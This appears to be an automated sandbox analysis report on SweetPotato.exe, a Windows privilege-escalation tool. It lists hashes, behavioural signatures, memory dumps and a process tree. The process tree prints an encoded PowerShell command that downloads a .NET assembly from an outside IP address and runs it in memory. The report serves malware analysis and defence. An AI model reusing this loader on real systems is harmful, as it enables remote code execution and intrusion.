Overview

overview

5

Static

static

3

SweetPotato.exe

windows7-x64

1

SweetPotato.exe

windows10-2004-x64

5

Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/10/2023, 05:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SweetPotato.exe

  • Size

    903KB

  • MD5

    f293d4c7f3a17eb84230caed9427584a

  • SHA1

    4041b704ad897b1bf1c86fc7d6d2937f0033467b

  • SHA256

    b9fb27d68786f8b8db534c02decf1a61b72363b41f14bde82a7b587d59e5875a

  • SHA512

    3948020a7c5dfb17dad5bb3011891c5ec567aef0a1913d3d8037929d8d1e51516d014650a99f7a4896f346525eeff8fea100bdf2a24d47f9dcb5cf04173a6c4d

  • SSDEEP

    24576:WrmXJcY5G1FOPjWcjL8TxNYqEv0rODHZ/lpWUmJKfplz7FkJpj:Wrm5cY56OaccTtsWIZ/GUm0fpB7

Score
5/10

Malware Config

Signatures

  • Drops file in System32 directory 2 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SweetPotato.exe
    "C:\Users\Admin\AppData\Local\Temp\SweetPotato.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4016
    • \??\c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAGkAdwByACAALQB1AHIAaQAgAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADUAMwAuADcANgAuADEANwA2AC8AYgBmAHQAZQBzAHQAMwAuAHQAeAB0ACkALgBjAG8AbgB0AGUAbgB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApACAAPgAgAEMAOgBcAFUAcwBlAHIAcwBcAEkATgBGAEEAMAAwADEAQQBcAGIAZgBzAGEAZgBlAGMAYQB0AC4AdAB4AHQACgA=
      2⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1548

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\Temp\__PSScriptPolicyTest_kl1clud0.a3v.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1548-6-0x00007FFE44BF0000-0x00007FFE456B1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1548-7-0x000001AA72CA0000-0x000001AA72CB0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1548-9-0x000001AA75460000-0x000001AA75482000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1548-8-0x000001AA72CA0000-0x000001AA72CB0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1548-21-0x00007FFE44BF0000-0x00007FFE456B1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4016-0-0x0000014AE6320000-0x0000014AE6406000-memory.dmp

    Filesize

    920KB

    Download

  • memory/4016-1-0x00007FFE44BF0000-0x00007FFE456B1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4016-3-0x0000014AE8AD0000-0x0000014AE8D82000-memory.dmp

    Filesize

    2.7MB

    Download

  • memory/4016-2-0x0000014AE8370000-0x0000014AE8380000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4016-5-0x00007FFE44BF0000-0x00007FFE456B1000-memory.dmp

    Filesize

    10.8MB

    Download